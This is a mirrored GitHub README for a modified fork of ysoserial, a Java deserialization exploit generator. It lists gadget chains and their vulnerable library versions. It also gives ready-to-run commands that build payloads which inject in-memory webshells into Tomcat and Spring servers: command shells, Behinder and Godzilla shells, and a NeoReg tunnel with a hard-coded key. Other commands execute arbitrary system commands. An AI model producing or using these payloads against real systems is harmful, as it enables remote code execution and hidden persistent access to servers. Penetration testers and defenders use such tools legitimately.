Giter Site home page Giter Site logo

goddemondemongod / ysoserial-y4er Goto Github PK

View Code? Open in Web Editor NEW

This project forked from hktalent/ysoserial-y4er

0.0 0.0 0.0 218 KB

ysoserial修改版,着重修改ysoserial.payloads.util.Gadgets.createTemplatesImpl使其可以通过引入自定义class的形式来执行命令、内存马、反序列化回显。

Home Page: https://jitpack.io/com/github/Y4er/ysoserial/main-SNAPSHOT/ysoserial-main-SNAPSHOT.jar

License: MIT License

Shell 0.06% Java 99.83% Dockerfile 0.11%

ysoserial-y4er's Introduction

ysoserial

ysoserial修改版,着重修改ysoserial.payloads.util.Gadgets.createTemplatesImpl使其可以通过引入自定义class的形式来执行命令、内存马、反序列化回显。

Usage

$  java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
  Available payload types:
四月 11, 2022 2:52:36 下午 org.reflections.Reflections scan
信息: Reflections took 77 ms to scan 1 urls, producing 22 keys and 184 values
     Payload                 Authors                                Dependencies
     -------                 -------                                ------------
     AspectJWeaver           @Jang                                  aspectjweaver:1.9.2, commons-collections:3.2.2
     BeanShell1              @pwntester, @cschneider4711            bsh:2.0b5
     C3P0                    @mbechler                              c3p0:0.9.5.2, mchange-commons-java:0.2.11
     Click1                  @artsploit                             click-nodeps:2.3.0, javax.servlet-api:3.1.0
     Clojure                 @JackOfMostTrades                      clojure:1.8.0
     CommonsBeanutils1       @frohoff                               commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
     CommonsBeanutils183NOCC @Y4er                                  commons-beanutils:1.8.3
     CommonsBeanutils192NOCC @Y4er                                  commons-beanutils:1.9.2
     CommonsCollections1     @frohoff                               commons-collections:3.1
     CommonsCollections12    @Y4er                                  commons-collections:3.1
     CommonsCollections2     @frohoff                               commons-collections4:4.0
     CommonsCollections3     @frohoff                               commons-collections:3.1
     CommonsCollections4     @frohoff                               commons-collections4:4.0
     CommonsCollections5     @matthias_kaiser, @jasinner            commons-collections:3.1
     CommonsCollections6     @matthias_kaiser                       commons-collections:3.1
     CommonsCollections7     @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
     CommonsCollections8     @navalorenzo                           commons-collections4:4.0
     FileUpload1             @mbechler                              commons-fileupload:1.3.1, commons-io:2.4
     Groovy1                 @frohoff                               groovy:2.3.9
     Hibernate1              @mbechler
     Hibernate2              @mbechler
     JBossInterceptors1      @matthias_kaiser                       javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     JRMPClient              @mbechler
     JRMPListener            @mbechler
     JSON1                   @mbechler                              json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
     JavassistWeld1          @matthias_kaiser                       javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     Jdk7u21                 @frohoff
     Jython1                 @pwntester, @cschneider4711            jython-standalone:2.5.2
     MozillaRhino1           @matthias_kaiser                       js:1.7R2
     MozillaRhino2           @_tint0                                js:1.7R2
     Myfaces1                @mbechler
     Myfaces2                @mbechler
     ROME                    @mbechler                              rome:1.0
     Spring1                 @frohoff                               spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
     Spring2                 @mbechler                              spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
     URLDNS                  @gebl
     Vaadin1                 @kai_ullrich                           vaadin-server:7.7.14, vaadin-shared:7.7.14
     Wicket1                 @jacob-baines                          wicket-util:6.23.0, slf4j-api:1.6.4

内存马相关

以CommonsBeanutils192NOCC为例:

java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho"                     # TomcatCmdEcho
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatServletMemShellFromJMX"      # TomcatServletMemShellFromJMX
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatServletMemShellFromThread"   # TomcatServletMemShellFromThread
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatFilterMemShellFromJMX"       # TomcatFilterMemShellFromJMX     适用于tomcat7-9
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatFilterMemShellFromThread"    # TomcatFilterMemShellFromThread  适用于tomcat7-9
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerMemShellFromJMX"     # TomcatListenerMemShellFromJMX
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerMemShellFromThread"  # TomcatListenerMemShellFromThread
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerNeoRegFromThread"    # TomcatListenerNeoRegFromThread     python neoreg.py -k fuckyou
java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:SpringInterceptorMemShell"         # SpringInterceptorMemShell       链接shell需要使用存在的路由
java -jar ysoserial.jar CommonsBeanutils192NOCC "FILE:E:\Calc.class"                      # ClassLoaderTemplate
java -jar ysoserial.jar CommonsBeanutils192NOCC "calc"                                    # CommandTemplate                 CLASS: FILE: 不使用协议开头则默认为执行cmd

一键注入cmdshell、冰蝎、哥斯拉内存马,shell连接使用请查看指定类。解决了request和response包装类导致冰蝎链接失败的问题,见issue

以下受到Gadgets.createTemplatesImpl影响的gadget均需要如上方式传递参数:

  1. Click1
  2. CommonsBeanutils1
  3. CommonsBeanutils183NOCC
  4. CommonsBeanutils192NOCC
  5. CommonsCollections2
  6. CommonsCollections3
  7. CommonsCollections4
  8. Hibernate1
  9. JavassistWeld1
  10. JBossInterceptors1
  11. Jdk7u21
  12. JSON1
  13. MozillaRhino1
  14. MozillaRhino2
  15. ROME
  16. Spring1
  17. Spring2
  18. Vaadin1

下载

  1. 点我下载打包好的jar包

Building

Requires Java 1.7+ and Maven 3.x+

mvn clean package -DskipTests

Contributing

  1. Fork it
  2. Create your feature branch (git checkout -b my-new-feature)
  3. Commit your changes (git commit -am 'Add some feature')
  4. Push to the branch (git push origin my-new-feature)
  5. Create new Pull Request

See Also

ysoserial-y4er's People

Contributors

y4er avatar zrquan avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.